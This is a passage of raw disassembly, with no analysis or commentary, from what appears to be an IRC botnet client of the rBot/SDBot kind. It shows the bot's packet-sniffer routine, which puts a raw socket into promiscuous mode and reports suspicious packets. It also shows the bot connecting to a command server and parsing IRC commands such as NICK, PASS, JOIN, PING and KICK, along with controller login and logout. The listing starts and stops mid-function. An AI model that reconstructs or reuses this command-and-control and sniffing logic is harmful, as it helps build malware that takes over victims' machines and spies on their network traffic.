cmp [ebp+74h+var_28], esi
jnz short loc_40929E
loc_409284: ; CODE XREF: sub_409180+170�j
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D62
add esp, 14h
loc_40929E: ; CODE XREF: sub_409180+102�j
; sub_409180+16E�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401F0F
pop ecx
push edi
jmp loc_409456
; ---------------------------------------------------------------------------
loc_4092B1: ; CODE XREF: sub_409180+E2�j
push esi
push esi
lea eax, [ebp+74h+var_20]
push eax
push esi
push esi
push 4
lea eax, [ebp+74h+var_8]
push eax
push 98000001h
push edi
call dword_43A498 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4092F2
call dword_43A47C ; WSAGetLastError
push eax
lea eax, [ebp+74h+var_2B4]
push offset aPsniffErrorWsa ; "[PSNIFF]: Error: WSAIoctl() failed, ret"...
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+74h+var_28], esi
jnz short loc_40929E
jmp short loc_409284
; ---------------------------------------------------------------------------
loc_4092F2: ; CODE XREF: sub_409180+14E�j
mov ebx, 0FFFFh
jmp loc_4093DA
; ---------------------------------------------------------------------------
loc_4092FC: ; CODE XREF: sub_409180+281�j
cmp byte ptr [ebp-10237h], 6
jnz loc_4093DA
cmp [ebp+74h+var_10293], 18h
mov eax, [ebp+74h+var_102A8]
mov [ebp+74h+var_C], eax
jnz loc_4093DA
lea eax, [ebp+74h+var_1028C]
push offset aPsniff_0 ; "[PSNIFF]"
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jnz loc_4093DA
mov eax, offset dword_42F758
xor edi, edi
mov [ebp+74h+arg_0], eax
loc_409344: ; CODE XREF: sub_409180+1DF�j
push eax
lea eax, [ebp+74h+var_1028C]
push eax
call sub_417440
test eax, eax
pop ecx
pop ecx
jnz short loc_409363
inc edi
add [ebp+74h+arg_0], 18h
mov eax, [ebp+74h+arg_0]
jnz short loc_409344
jmp short loc_4093DA
; ---------------------------------------------------------------------------
loc_409363: ; CODE XREF: sub_409180+1D5�j
lea eax, [ebp+74h+var_1028C]
push eax
push [ebp+74h+var_102A0]
call dword_43A4B8 ; ntohs
movzx eax, ax
push eax
push [ebp+74h+var_C]
call dword_43A440 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_42F76C[eax*8]
push off_42F748[eax*4]
lea eax, [ebp+74h+var_2B4]
push offset aPsniffSuspicio ; "[PSNIFF]: Suspicious %s packet from: %s"...
push 200h
push eax
call sub_416BCD
add esp, 1Ch
cmp [ebp+74h+var_28], esi
jnz short loc_4093CD
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D62
add esp, 14h
loc_4093CD: ; CODE XREF: sub_409180+231�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401F0F
pop ecx
loc_4093DA: ; CODE XREF: sub_409180+177�j
; sub_409180+183�j ...
xor eax, eax
lea edi, [ebp+74h+var_102B4]
mov ecx, 3FFFh
rep stosd
stosw
push esi
stosb
push ebx
lea eax, [ebp+74h+var_102B4]
push eax
push [ebp+74h+var_4]
call dword_43A324 ; recv
cmp eax, 0FFFFFFFFh
jnz loc_4092FC
call dword_43A47C ; WSAGetLastError
push eax
push offset aPsniffErrorRec ; "[PSNIFF]: Error: recv() failed, returne"...
lea eax, [ebp+74h+var_2B4]
push 200h
push eax
call sub_416BCD
add esp, 10h
cmp [ebp+74h+var_28], esi
jnz short loc_409446
push esi
push [ebp+74h+var_2C]
lea eax, [ebp+74h+var_2B4]
push eax
lea eax, [ebp+74h+var_B0]
push eax
push [ebp+74h+var_B4]
call sub_405D62
add esp, 14h
loc_409446: ; CODE XREF: sub_409180+2AA�j
lea eax, [ebp+74h+var_2B4]
push eax
call sub_401F0F
pop ecx
push [ebp+74h+var_4]
loc_409456: ; CODE XREF: sub_409180+12C�j
call dword_43A4D0 ; closesocket
push [ebp+74h+var_30]
call sub_4139F6
loc_409464: ; CODE XREF: sub_409180+BE�j
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_409180 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_40946D proc near ; CODE XREF: sub_4096E9+D0�p
var_1E1C = byte ptr -1E1Ch
var_E1C = byte ptr -0E1Ch
var_64C = byte ptr -64Ch
var_5AC = byte ptr -5ACh
var_4AC = byte ptr -4ACh
var_2AC = byte ptr -2ACh
var_AC = byte ptr -0ACh
var_2C = byte ptr -2Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1E1Ch
lea ebp, [esp-58h]
call sub_416B90
push ebx
push esi
xor ebx, ebx
push 2
mov [ebp+58h+var_14], ebx
lea eax, [ebp+58h+var_5AC]
pop ecx
loc_40948C: ; CODE XREF: sub_40946D+28�j
and byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_40948C
cmp byte_480ADC, 0
jz short loc_4094B5
push offset byte_480ADC
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_405D17
add esp, 0Ch
loc_4094B5: ; CODE XREF: sub_40946D+31�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_2C]
push ebx
push ebx
push 2
push eax
call sub_411114
add esp, 10h
push eax
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_AC]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax
call sub_416975
lea eax, [ebp+58h+var_AC]
add esp, 14h
lea esi, [eax+1]
loc_4094E3: ; CODE XREF: sub_40946D+7B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4094E3
push ebx
sub eax, esi
push eax
lea eax, [ebp+58h+var_AC]
push eax
push [ebp+58h+arg_0]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40951B
push [ebp+58h+arg_0]
call dword_43A4D0 ; closesocket
push 7D0h
call dword_422000 ; Sleep
xor eax, eax
jmp loc_4096E2
; ---------------------------------------------------------------------------
loc_40951B: ; CODE XREF: sub_40946D+91�j
push edi
jmp loc_4096A8
; ---------------------------------------------------------------------------
loc_409521: ; CODE XREF: sub_40946D+262�j
lea eax, [ebp+58h+var_E1C]
push eax
lea eax, [ebp+58h+var_1E1C]
push eax
call sub_4072AC
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_18], eax
mov [ebp+58h+var_10], ebx
jle loc_4096A8
lea esi, [ebp+58h+var_E1C]
mov [ebp+58h+var_C], esi
loc_40954D: ; CODE XREF: sub_40946D+235�j
push offset asc_4285C0 ; " :"
push dword ptr [esi]
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_2AC]
rep stosd
call sub_417440
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+58h+var_4], eax
jz short loc_409577
add [ebp+58h+var_4], 2
jmp short loc_40957C
; ---------------------------------------------------------------------------
loc_409577: ; CODE XREF: sub_40946D+102�j
mov eax, [esi]
mov [ebp+58h+var_4], eax
loc_40957C: ; CODE XREF: sub_40946D+108�j
push 1FFh
push [ebp+58h+var_4]
lea eax, [ebp+58h+var_2AC]
push eax
call sub_416A00
lea eax, [ebp+58h+var_2AC]
push offset asc_4285BC ; "|"
push eax
call sub_4177E9
add esp, 14h
test eax, eax
mov [ebp+58h+var_8], eax
lea ebx, [ebp+58h+var_2AC]
jz loc_409691
loc_4095B5: ; CODE XREF: sub_40946D+21E�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+58h+var_4AC]
rep stosd
mov eax, [esi]
mov ecx, [ebp+58h+var_4]
sub ecx, eax
push ecx
push eax
lea eax, [ebp+58h+var_4AC]
push eax
call sub_416A00
mov eax, [ebp+58h+var_8]
add esp, 0Ch
mov esi, eax
loc_4095E1: ; CODE XREF: sub_40946D+179�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4095E1
lea edi, [ebp+58h+var_4AC]
sub eax, esi
dec edi
loc_4095F1: ; CODE XREF: sub_40946D+18A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4095F1
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+58h+var_8]
and ecx, 3
rep movsb
lea esi, [eax+1]
loc_40960D: ; CODE XREF: sub_40946D+1A5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40960D
sub eax, esi
lea ebx, [ebx+eax+1]
push offset asc_4285BC ; "|"
push ebx
call sub_4177E9
pop ecx
xor esi, esi
pop ecx
mov [ebp+58h+var_8], eax
inc esi
loc_40962D: ; CODE XREF: sub_40946D+206�j
push [ebp+58h+arg_1C]
lea eax, [ebp+58h+var_14]
push esi
push eax
lea eax, [ebp+58h+var_64C]
push eax
lea eax, [ebp+58h+var_5AC]
push eax
push [ebp+58h+arg_18]
lea eax, [ebp+58h+var_4AC]
push [ebp+58h+arg_C]
push [ebp+58h+arg_8]
push [ebp+58h+arg_4]
push [ebp+58h+arg_0]
push eax
call sub_409848
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_409675
push 0FAh
call dword_422000 ; Sleep
jmp short loc_40962D
; ---------------------------------------------------------------------------
loc_409675: ; CODE XREF: sub_40946D+1F9�j
cmp esi, 0FFFFFFFDh
jz short loc_4096DE
cmp esi, 0FFFFFFFEh
jz short loc_4096D9
cmp esi, 0FFFFFFFFh
jz short loc_4096D5
cmp [ebp+58h+var_8], 0
mov esi, [ebp+58h+var_C]
jnz loc_4095B5
loc_409691: ; CODE XREF: sub_40946D+142�j
inc [ebp+58h+var_10]
mov eax, [ebp+58h+var_10]
add esi, 4
xor ebx, ebx
cmp eax, [ebp+58h+var_18]
mov [ebp+58h+var_C], esi
jl loc_40954D
loc_4096A8: ; CODE XREF: sub_40946D+AF�j
; sub_40946D+D1�j
xor eax, eax
push ebx
lea edi, [ebp+58h+var_1E1C]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+58h+var_1E1C]
push eax
push [ebp+58h+arg_0]
call dword_43A324 ; recv
test eax, eax
jg loc_409521
loc_4096D5: ; CODE XREF: sub_40946D+215�j
xor eax, eax
jmp short loc_4096E1
; ---------------------------------------------------------------------------
loc_4096D9: ; CODE XREF: sub_40946D+210�j
xor eax, eax
inc eax
jmp short loc_4096E1
; ---------------------------------------------------------------------------
loc_4096DE: ; CODE XREF: sub_40946D+20B�j
push 2
pop eax
loc_4096E1: ; CODE XREF: sub_40946D+26A�j
; sub_40946D+26F�j
pop edi
loc_4096E2: ; CODE XREF: sub_40946D+A9�j
pop esi
pop ebx
add ebp, 58h
leave
retn
sub_40946D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4096E9 proc near ; CODE XREF: sub_40FB4C+47C�p
; DATA XREF: sub_409848+2F12�o
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 59h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
inc ebx
rep movsd
mov [eax+160h], ebx
jmp loc_4097E4
; ---------------------------------------------------------------------------
loc_409713: ; CODE XREF: sub_4096E9+129�j
push 7
pop ecx
xor eax, eax
push eax
push dword_42FCE0
lea edi, [ebp+var_2C]
push dword_42FCDC
rep stosd
lea eax, [ebp+var_2C]
push eax
call sub_411114
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh
add eax, offset byte_43B278
push edi
push eax
call sub_416A00
add esp, 1Ch
push 6
push ebx
push 2
call dword_43A3BC ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
mov dword_43B26C[eax], esi
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40981A
lea eax, [ebp+var_18C]
push eax
push offset aMainConnectedT ; "[MAIN]: Connected to %s."
call sub_401F83
push [ebp+var_38]
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
push [ebp+var_190]
lea eax, [ebp+var_CC]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_40946D
add esp, 28h
push esi
mov edi, eax
call dword_43A4D0 ; closesocket
test edi, edi
jz short loc_4097E4
cmp edi, ebx
jnz short loc_4097DF
push 1D4C0h
call dword_422000 ; Sleep
jmp short loc_4097E4
; ---------------------------------------------------------------------------
loc_4097DF: ; CODE XREF: sub_4096E9+E7�j
cmp edi, 2
jz short loc_409835
loc_4097E4: ; CODE XREF: sub_4096E9+25�j
; sub_4096E9+E3�j ...
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_43A514 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_18C]
push eax
call sub_40877E
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz loc_409713
jmp short loc_409841
; ---------------------------------------------------------------------------
loc_40981A: ; CODE XREF: sub_4096E9+92�j
push esi
call dword_43A4D0 ; closesocket
call sub_4087A7
push 7D0h
call dword_422000 ; Sleep
mov eax, ebx
jmp short loc_409841
; ---------------------------------------------------------------------------
loc_409835: ; CODE XREF: sub_4096E9+F9�j
push [ebp+var_34]
call sub_4139F6
pop ecx
push 2
pop eax
loc_409841: ; CODE XREF: sub_4096E9+12F�j
; sub_4096E9+14A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4096E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409848 proc near ; CODE XREF: sub_40946D+1EC�p
var_2804 = byte ptr -2804h
var_2404 = byte ptr -2404h
var_2204 = byte ptr -2204h
var_2004 = byte ptr -2004h
var_1F04 = byte ptr -1F04h
var_1E04 = byte ptr -1E04h
var_1E00 = byte ptr -1E00h
var_1D00 = dword ptr -1D00h
var_1CFC = dword ptr -1CFCh
var_1CF8 = byte ptr -1CF8h
var_1C78 = byte ptr -1C78h
var_1BF8 = byte ptr -1BF8h
var_1B78 = byte ptr -1B78h
var_1AF8 = byte ptr -1AF8h
var_1A78 = dword ptr -1A78h
var_1A74 = dword ptr -1A74h
var_1A70 = dword ptr -1A70h
var_1A6C = dword ptr -1A6Ch
var_1A68 = byte ptr -1A68h
var_19E8 = byte ptr -19E8h
var_1968 = byte ptr -1968h
var_18E8 = byte ptr -18E8h
var_1868 = dword ptr -1868h
var_1864 = dword ptr -1864h
var_1860 = dword ptr -1860h
var_185C = dword ptr -185Ch
var_1858 = dword ptr -1858h
var_1854 = byte ptr -1854h
var_17D4 = byte ptr -17D4h
var_1754 = byte ptr -1754h
var_16D4 = dword ptr -16D4h
var_16D0 = dword ptr -16D0h
var_16CC = dword ptr -16CCh
var_16C8 = dword ptr -16C8h
var_16C4 = byte ptr -16C4h
var_16C0 = byte ptr -16C0h
var_1640 = byte ptr -1640h
var_1600 = byte ptr -1600h
var_1570 = dword ptr -1570h
var_156C = dword ptr -156Ch
var_1568 = dword ptr -1568h
var_1564 = dword ptr -1564h
var_1560 = byte ptr -1560h
var_155C = byte ptr -155Ch
var_145C = dword ptr -145Ch
var_1458 = byte ptr -1458h
var_1454 = dword ptr -1454h
var_1450 = byte ptr -1450h
var_13D0 = byte ptr -13D0h
var_1354 = byte ptr -1354h
var_12CC = byte ptr -12CCh
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = byte ptr -1244h
var_11C8 = dword ptr -11C8h
var_11C4 = dword ptr -11C4h
var_11C0 = dword ptr -11C0h
var_11BC = dword ptr -11BCh
var_11B8 = dword ptr -11B8h
var_11B4 = byte ptr -11B4h
var_1134 = byte ptr -1134h
var_10B4 = byte ptr -10B4h
var_1034 = dword ptr -1034h
var_1030 = dword ptr -1030h
var_102C = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_1010 = byte ptr -1010h
var_F90 = byte ptr -0F90h
var_F10 = dword ptr -0F10h
var_F0C = dword ptr -0F0Ch
var_F08 = dword ptr -0F08h
var_F00 = dword ptr -0F00h
var_EFC = dword ptr -0EFCh
var_EF8 = dword ptr -0EF8h
var_EF0 = byte ptr -0EF0h
var_EA0 = dword ptr -0EA0h
var_E9C = byte ptr -0E9Ch
var_E98 = dword ptr -0E98h
var_E94 = byte ptr -0E94h
var_E14 = byte ptr -0E14h
var_D14 = byte ptr -0D14h
var_C15 = byte ptr -0C15h
var_C14 = byte ptr -0C14h
var_B14 = dword ptr -0B14h
var_B10 = dword ptr -0B10h
var_B0C = dword ptr -0B0Ch
var_B08 = dword ptr -0B08h
var_B04 = dword ptr -0B04h
var_B00 = dword ptr -0B00h
var_AFC = dword ptr -0AFCh
var_AF8 = dword ptr -0AF8h
var_AF4 = dword ptr -0AF4h
var_AF0 = byte ptr -0AF0h
var_AD0 = dword ptr -0AD0h
var_ACC = byte ptr -0ACCh
var_A90 = dword ptr -0A90h
var_A8C = byte ptr -0A8Ch
var_A4C = byte ptr -0A4Ch
var_A0C = byte ptr -0A0Ch
var_98C = byte ptr -98Ch
var_90C = dword ptr -90Ch
var_908 = dword ptr -908h
var_904 = dword ptr -904h
var_900 = dword ptr -900h
var_8FC = dword ptr -8FCh
var_8F8 = dword ptr -8F8h
var_8F4 = dword ptr -8F4h
var_8F0 = byte ptr -8F0h
var_870 = dword ptr -870h
var_86C = byte ptr -86Ch
var_860 = byte ptr -860h
var_85C = byte ptr -85Ch
var_7EC = byte ptr -7ECh
var_76C = dword ptr -76Ch
var_768 = dword ptr -768h
var_764 = dword ptr -764h
var_760 = dword ptr -760h
var_75C = byte ptr -75Ch
var_750 = byte ptr -750h
var_740 = dword ptr -740h
var_73C = byte ptr -73Ch
var_6BC = byte ptr -6BCh
var_63C = dword ptr -63Ch
var_638 = dword ptr -638h
var_634 = dword ptr -634h
var_630 = dword ptr -630h
var_62C = dword ptr -62Ch
var_628 = dword ptr -628h
var_624 = dword ptr -624h
var_620 = dword ptr -620h
var_61C = byte ptr -61Ch
var_60C = byte ptr -60Ch
var_5FC = dword ptr -5FCh
var_5F8 = byte ptr -5F8h
var_578 = byte ptr -578h
var_4F8 = dword ptr -4F8h
var_4F4 = dword ptr -4F4h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4DC = dword ptr -4DCh
var_4D8 = dword ptr -4D8h
var_4D0 = dword ptr -4D0h
var_4CC = dword ptr -4CCh
var_4C8 = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
var_4BC = byte ptr -4BCh
var_4A0 = dword ptr -4A0h
var_49C = byte ptr -49Ch
var_498 = dword ptr -498h
var_494 = byte ptr -494h
var_488 = dword ptr -488h
var_484 = byte ptr -484h
var_41C = byte ptr -41Ch
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = dword ptr -400h
var_3FC = dword ptr -3FCh
var_3F8 = dword ptr -3F8h
var_3F4 = dword ptr -3F4h
var_3F0 = byte ptr -3F0h
var_38F = byte ptr -38Fh
var_38E = byte ptr -38Eh
var_38C = byte ptr -38Ch
var_38B = byte ptr -38Bh
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = byte ptr -37Ch
var_376 = byte ptr -376h
var_354 = byte ptr -354h
var_334 = dword ptr -334h
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = dword ptr -0D4h
var_C8 = byte ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_64 = byte ptr -64h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 2804h
call sub_416B90
push ebx
push esi
push edi
mov esi, 80h
xor eax, eax
push 1Bh
push [ebp+arg_10]
xor ebx, ebx
mov ecx, esi
lea edi, [ebp+var_2F0]
rep stosd
lea eax, [ebp+var_4BC]
push eax
mov [ebp+var_20], 3
mov [ebp+var_18], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_416A00
add esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], ebx
jz loc_409AC8
mov ecx, esi
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea edi, [ebp+var_2204]
rep stosd
lea eax, [ebp+var_2204]
push eax
call sub_416A00
lea eax, [ebp+var_2204]
push offset asc_4285C0 ; " :"
push eax
call sub_417440
mov [ebp+var_14], eax
push esi
lea eax, [ebp+var_2204]
push eax
lea eax, [ebp+var_2404]
push eax
call sub_416A00
mov esi, offset asc_422B00 ; " "
lea eax, [ebp+var_2404]
push esi
push eax
call sub_4177E9
xor edi, edi
add esp, 28h
mov [ebp+var_A4], eax
inc edi
loc_409905: ; CODE XREF: sub_409848+D1�j
push esi
push ebx
call sub_4177E9
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_409905
mov ebx, [ebp+var_A4]
xor esi, esi
cmp ebx, esi
jz loc_409AC6
cmp [ebp+var_A0], esi
jz loc_409AC6
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_3F0]
push 1Fh
rep stosd
pop edx
loc_409947: ; CODE XREF: sub_409848+137�j
lea ecx, [ebp+edx*4+var_A4]
mov eax, [ecx]
cmp eax, esi
jz short loc_40997E
cmp byte ptr [eax], 2Dh
jnz short loc_409981
cmp byte ptr [eax+2], 0
jnz short loc_409981
movsx edi, byte ptr [eax+1]
and byte ptr [eax], 0
and byte ptr [eax+1], 0
and byte ptr [eax+2], 0
mov [ecx], esi
mov ebx, [ebp+var_A4]
mov [ebp+edi+var_3F0], 1
loc_40997E: ; CODE XREF: sub_409848+10A�j
dec edx
jns short loc_409947
loc_409981: ; CODE XREF: sub_409848+10F�j
; sub_409848+115�j
cmp byte ptr [ebp+var_380+3], 0
jz short loc_409991
mov [ebp+var_C], 1
loc_409991: ; CODE XREF: sub_409848+140�j
cmp byte ptr [ebp+var_384+2], 0
jz short loc_4099A4
mov [ebp+var_C], esi
mov [ebp+var_4], 1
loc_4099A4: ; CODE XREF: sub_409848+150�j
cmp byte ptr [ebx], 0Ah
jz short loc_4099DE
push 7Fh
lea eax, [ebp+var_8F0]
push ebx
push eax
call sub_416A00
push 17h
lea eax, [ebx+1]
push eax
lea eax, [ebp+var_F0]
push eax
call sub_416A00
lea eax, [ebp+var_F0]
push offset asc_42A9B4 ; "!"
push eax
call sub_4177E9
add esp, 20h
loc_4099DE: ; CODE XREF: sub_409848+15F�j
push 5
mov edi, ebx
mov esi, offset aPing ; "PING"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409A2C
push [ebp+var_A0]
mov byte ptr [ebx+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_405D17
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp dword ptr [eax], 0
jnz loc_409AC6
loc_409A14: ; CODE XREF: sub_409848+3D7�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_409A1F: ; CODE XREF: sub_409848+6D3�j
; sub_409848+939�j ...
push [ebp+arg_4]
call sub_405D17
jmp loc_40E7C6
; ---------------------------------------------------------------------------
loc_409A2C: ; CODE XREF: sub_409848+1A4�j
mov edx, [ebp+var_A0]
push 4
pop eax
mov edi, edx
mov esi, offset a001 ; "001"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40FB04
mov edi, edx
mov esi, offset a005 ; "005"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40FB04
mov edi, edx
mov esi, offset a302 ; "302"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jnz short loc_409A8F
push offset a@ ; "@"
push [ebp+var_98]
call sub_417440
test eax, eax
pop ecx
pop ecx
jz short loc_409AC6
push 9Fh
inc eax
push eax
push [ebp+arg_1C]
jmp loc_409D34
; ---------------------------------------------------------------------------
loc_409A8F: ; CODE XREF: sub_409848+220�j
mov ecx, eax
mov edi, edx
mov esi, offset a433 ; "433"
xor eax, eax
repe cmpsb
jnz short loc_409ACE
push eax
push dword_42FCE0
push dword_42FCDC
push [ebp+arg_10]
call sub_411114
push [ebp+arg_10]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405D17
add esp, 1Ch
loc_409AC6: ; CODE XREF: sub_409848+DD�j
; sub_409848+E9�j ...
xor eax, eax
loc_409AC8: ; CODE XREF: sub_409848+52�j
inc eax
loc_409AC9: ; CODE XREF: sub_409848+16FE�j
; sub_409848+34F4�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409ACE: ; CODE XREF: sub_409848+254�j
mov edi, [ebp+arg_18]
push 2
pop edx
loc_409AD4: ; CODE XREF: sub_409848+2CD�j
lea eax, [ebp+var_8F0]
mov esi, edi
loc_409ADC: ; CODE XREF: sub_409848+2B0�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_409AFE
test cl, cl
jz short loc_409AFA
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_409AFE
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_409ADC
loc_409AFA: ; CODE XREF: sub_409848+29E�j
xor eax, eax
jmp short loc_409B03
; ---------------------------------------------------------------------------
loc_409AFE: ; CODE XREF: sub_409848+29A�j
; sub_409848+2A8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409B03: ; CODE XREF: sub_409848+2B4�j
test eax, eax
jnz short loc_409B0E
mov [ebp+var_1C], 1
loc_409B0E: ; CODE XREF: sub_409848+2BD�j
add edi, 80h
dec edx
jnz short loc_409AD4
mov edi, [ebp+var_A0]
push 5
mov esi, offset aKick ; "KICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409C24
mov edi, [ebp+arg_18]
push 2
pop ebx
loc_409B35: ; CODE XREF: sub_409848+393�j
cmp byte ptr [edi], 0
jz loc_409BD4
push 7Fh
lea eax, [ebp+var_8F0]
push edi
push eax
call sub_416A00
add esp, 0Ch
cmp [ebp+var_98], 0
jz short loc_409BD4
mov esi, [ebp+var_98]
lea eax, [ebp+var_F0]
loc_409B65: ; CODE XREF: sub_409848+339�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_409B87
test cl, cl
jz short loc_409B83
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_409B87
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_409B65
loc_409B83: ; CODE XREF: sub_409848+327�j
xor eax, eax
jmp short loc_409B8C
; ---------------------------------------------------------------------------
loc_409B87: ; CODE XREF: sub_409848+323�j
; sub_409848+331�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409B8C: ; CODE XREF: sub_409848+33D�j
test eax, eax
jnz short loc_409BD4
and [edi], al
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_416975
lea eax, [ebp+var_2F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_405D17
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
add esp, 20h
loc_409BD4: ; CODE XREF: sub_409848+2F0�j
; sub_409848+30F�j ...
add edi, 80h
dec ebx
jnz loc_409B35
mov esi, [ebp+var_98]
mov eax, [ebp+arg_10]
